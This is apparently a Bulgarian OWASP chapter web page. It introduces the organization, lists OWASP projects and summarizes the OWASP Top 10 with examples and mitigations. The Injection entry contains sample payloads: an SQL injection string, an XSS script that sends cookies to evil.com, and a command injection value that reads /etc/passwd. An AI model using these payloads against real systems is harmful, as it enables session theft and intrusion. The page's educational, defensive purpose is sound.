Първата българска OWASP общност — част от OWASP (Open Worldwide Application Security Project) — глобална нестопанска организация, посветена на подобряването на сигурността на софтуера. Обединяваме ентусиасти, професионалисти и експерти по киберсигурност с мисията да направим дигиталния свят по-сигурен чрез образование, споделяне на знания и отворено сътрудничество.
Запознайте се с организацията и нашата мисия в България.
OWASP е международна нестопанска организация, създадена през 2001 г., чиято цел е софтуерната сигурност да бъде видима и достъпна за всички. Всички материали са безплатни и с отворен достъп — инструменти, документация, стандарти и стотици глави по целия свят.
Като първата OWASP общност в България, ние:
Архив на минали презентации с линкове към записи и материали.
Ключови OWASP проекти и материали — част от тях преведени на български.
Application Security Verification Standard — рамка за тестване на сигурността на уеб приложения и определяне на изисквания.
EN English Научи повече →Изчерпателно ръководство за тестване на сигурността на уеб приложения с практически методологии и техники.
EN English Научи повече →Колекция от кратки и практични ръководства по конкретни теми в сигурността на приложенията.
EN English Научи повече →Software Assurance Maturity Model — модел за оценка и подобряване на практиките за сигурност в софтуерната разработка.
EN English Научи повече →Безплатен инструмент с отворен код за автоматизирано тестване на сигурността на уеб приложения.
EN English Научи повече →Стандарт и ръководство за тестване на сигурността на мобилни приложения (MASVS и MASTG).
EN English Научи повече →Инструмент за Software Composition Analysis (SCA) — открива публично известни уязвимости в зависимостите на проекта.
EN English Научи повече →Умишлено уязвимо уеб приложение за обучение и практика по сигурност — идеално за CTF и workshops.
EN English Научи повече →Ръководства и стандарти за сигурност на AI/ML системи — заплахи, атаки и защита на модели и данни.
EN English Научи повече →Top 10 рискове за сигурността на API — специализиран списък за REST, GraphQL и други API архитектури.
EN English Научи повече →Набор от правила за Web Application Firewall (WAF) — защита от injection, XSS и други атаки на ниво HTTP трафик.
EN English Научи повече →Инструмент за мрежово картографиране и discovery на attack surface — DNS enumeration, ASN discovery и OSINT.
EN English Научи повече →Списъкът на десетте най-критични класа уязвимости в уеб приложенията — актуализиран на всеки 3–4 години. Спрямо 2021: SSRF отпада, влиза новата категория за грешна обработка на изключения. Редът значително се е променил. Пълен списък (EN) →
Потребители достъпват ресурси извън правата си. Запазва позицията си като най-честата уязвимост.
Примери: IDOR (Insecure Direct Object Reference) — промяна на /api/user/123 на /api/user/456 за достъп до чужд акаунт. Privilege escalation — обикновен потребител достъпва администраторски панел. Липсващи authorization checks на API endpoints.
Препоръчани мерки: Прилагайте deny-by-default подход. Проверявайте правата на сървъра при всяка заявка. Използвайте RBAC (Role-Based Access Control). Деактивирайте directory listing. Логвайте и алертирайте при повтарящи се неуспешни опити за достъп.
Прочети повече →Прескача от A05 на A02. Изключително честа в облачни среди поради сложността на конфигурацията.
Примери: Default credentials оставени в production (admin/admin). Излишни услуги и портове отворени. Verbose error messages, разкриващи stack traces. Публично достъпен S3 bucket. XXE (XML External Entity) атаки чрез некоректно конфигуриран XML parser.
Препоръчани мерки: Автоматизирайте hardening процесите. Премахвайте ненужни features и frameworks. Преглеждайте cloud permissions редовно. Използвайте Infrastructure as Code със security scanning. Деактивирайте XML external entity processing.
Прочети повече →Еволюция на „Vulnerable Components“ — разширена до цялата верига на доставки на софтуер.
Примери: Злонамерени пакети в npm/PyPI (typosquatting — loadash вместо lodash). Компрометирани CI/CD pipelines — атакуващ инжектира код в build процеса. XZ Utils backdoor (CVE-2024-3094) — злонамерен код вграден в популярна compression библиотека.
Препоръчани мерки: Поддържайте Software Bill of Materials (SBOM). Използвайте lock files и проверявайте integrity hashes. Сканирайте зависимостите с SCA инструменти (Dependabot, Snyk). Подписвайте артефактите с Sigstore/cosign. Ограничете достъпа до CI/CD pipeline конфигурации.
Прочети повече →Слизане от A02 на A04. Чувствителни данни, предавани или съхранявани без адекватно криптиране.
Примери: Пароли хеширани с MD5 или SHA-1 вместо bcrypt/Argon2. Липса на HTTPS — данни предавани в plaintext. Слаби TLS конфигурации (TLS 1.0/1.1). Hardcoded API ключове и secrets в сорс кода. Sensitive data в URL параметри, видими в server logs.
Препоръчани мерки: Криптирайте данните at rest и in transit. Използвайте TLS 1.2+ с модерни cipher suites. Хеширайте пароли с bcrypt, scrypt или Argon2id. Генерирайте ключове с CSPRNG. Не съхранявайте чувствителни данни без нужда. Управлявайте secrets чрез vault системи.
Прочети повече →Невалидирани входни данни, интерпретирани като команди. Слиза от A03 на A05, но остава изключително опасна.
Примери: SQL Injection — ' OR 1=1 -- в login форма. XSS (Cross-Site Scripting) — <script>document.location='evil.com?c='+document.cookie</script>. OS Command Injection — ; cat /etc/passwd в input поле. LDAP injection в корпоративни директории.
Препоръчани мерки: Използвайте параметризирани заявки (prepared statements) винаги. Прилагайте input validation с allowlists. Escape-вайте output според контекста (HTML, JS, SQL). Използвайте ORM frameworks. Прилагайте Content Security Policy (CSP) за XSS защита.
Прочети повече →Проблемите в архитектурата не могат да се поправят само с добра имплементация — трябват фундаментални промени в дизайна.
Примери: Password recovery чрез „security questions“ с лесно достъпни отговори. Липса на rate limiting на критични операции (password reset, SMS verification). Бизнес логика, позволяваща купуване на продукти с отрицателна цена. API без pagination, позволяващ dump на цялата база.
Препоръчани мерки: Прилагайте threat modeling (STRIDE, PASTA) при проектиране. Дефинирайте security requirements от началото. Използвайте secure design patterns и reference architectures. Включвайте abuse cases и negative testing в QA процеса. Прилагайте principle of least privilege в архитектурата.
Прочети повече →Слабости в механизмите за удостоверяване на самоличността. Остава на A07 с леко разширен обхват.
Примери: Credential stuffing — автоматизирано тестване на откраднати username/password двойки. Липса на MFA за критични операции. Session fixation — атакуващ задава session ID преди автентикация. JWT tokens без expiration или с alg: none. Пароли без минимална сложност.
Препоръчани мерки: Имплементирайте MFA (multi-factor authentication). Използвайте rate limiting и account lockout. Генерирайте нов session ID след login. Валидирайте JWT с правилен алгоритъм и expiration. Интегрирайте проверка срещу списъци с компрометирани пароли (Have I Been Pwned API).
Прочети повече →Код и инфраструктура, които не проверяват целостта на софтуера и данните.
Примери: SolarWinds Orion — компрометиран build процес инжектира backdoor в легитимен софтуер. XZ Utils (CVE-2024-3094) — злонамерен maintainer вгражда backdoor. Insecure deserialization — ObjectInputStream.readObject() без validation. Auto-update механизъм без проверка на цифров подпис.
Препоръчани мерки: Подписвайте и верифицирайте всички software updates. Защитете CI/CD pipeline с access controls и audit logs. Избягвайте deserialization на untrusted данни. Използвайте Subresource Integrity (SRI) за CDN ресурси. Мониторирайте зависимостите за known vulnerabilities.
Прочети повече →Липса на адекватно логване и алерти при аномалии. Атаките остават незабелязани средно 207 дни.
Примери: Неуспешни login опити не се логват — brute force атаките остават незабелязани. Логове без timestamps или source IP. Липса на алерти при масово изтегляне на данни (data exfiltration). Логове съхранявани само локално — атакуващ ги изтрива. Sensitive данни (пароли, tokens) записани в логове.
Препоръчани мерки: Логвайте всички authentication, access control и input validation грешки. Изпращайте логовете към централизирана SIEM система. Настройте алерти за подозрителни модели (multiple failed logins, unusual data access). Не логвайте sensitive данни. Дефинирайте incident response план и тествайте го редовно.
Прочети повече →Нова за 2025. Заменя SSRF. Неправилна обработка на грешки и изключителни ситуации, водещи до непредвидено поведение.
Примери: Null pointer dereference, причиняващ crash на критичен сървис. Race conditions при финансови транзакции — double spending. Необработени изключения, разкриващи вътрешна информация за системата. Timeout failures, оставящи ресурси в inconsistent state. Off-by-one errors в boundary checks.
Препоръчани мерки: Имплементирайте comprehensive error handling за всички code paths. Използвайте generic error messages за потребителите. Прилагайте defensive programming — валидирайте assumptions. Тествайте с fuzzing и chaos engineering. Използвайте mutex/locks за предотвратяване на race conditions. Дефинирайте graceful degradation стратегии.
Прочети повече →Организации и общности, с които споделяме мисия и ценности.
Българска общност за етично хакерство, изследвания и споделяне на знания в киберсигурността.
Месечни срещи за киберсигурност в България — специалисти, институции и ентусиасти споделят опит и идеи.
Българска фондация за киберсигурност — образование, кариерно развитие и професионална мрежа.
Конференция за информационна сигурност в София — част от глобалната BSides общност.
Софийският клон на ISACA — одит, управление на риска и информационна сигурност.
Професионална организация за развитие на киберсигурността в България чрез образование и сътрудничество.
Свържете се с нас или се присъединете към общността.